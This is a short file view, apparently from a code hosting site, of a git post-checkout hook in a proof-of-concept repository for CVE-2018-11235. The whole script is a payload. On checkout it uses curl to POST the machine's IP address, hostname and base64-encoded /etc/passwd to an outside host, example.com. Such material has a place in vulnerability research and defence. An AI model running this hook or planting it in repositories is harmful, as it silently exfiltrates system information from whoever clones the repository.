PoC-CVE-2018-11235/modules/1/2/3/4/evil/hooks/post-checkout

3 lines
143 B
Bash
Executable File

#!/bin/bash
curl -X POST http://example.com -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"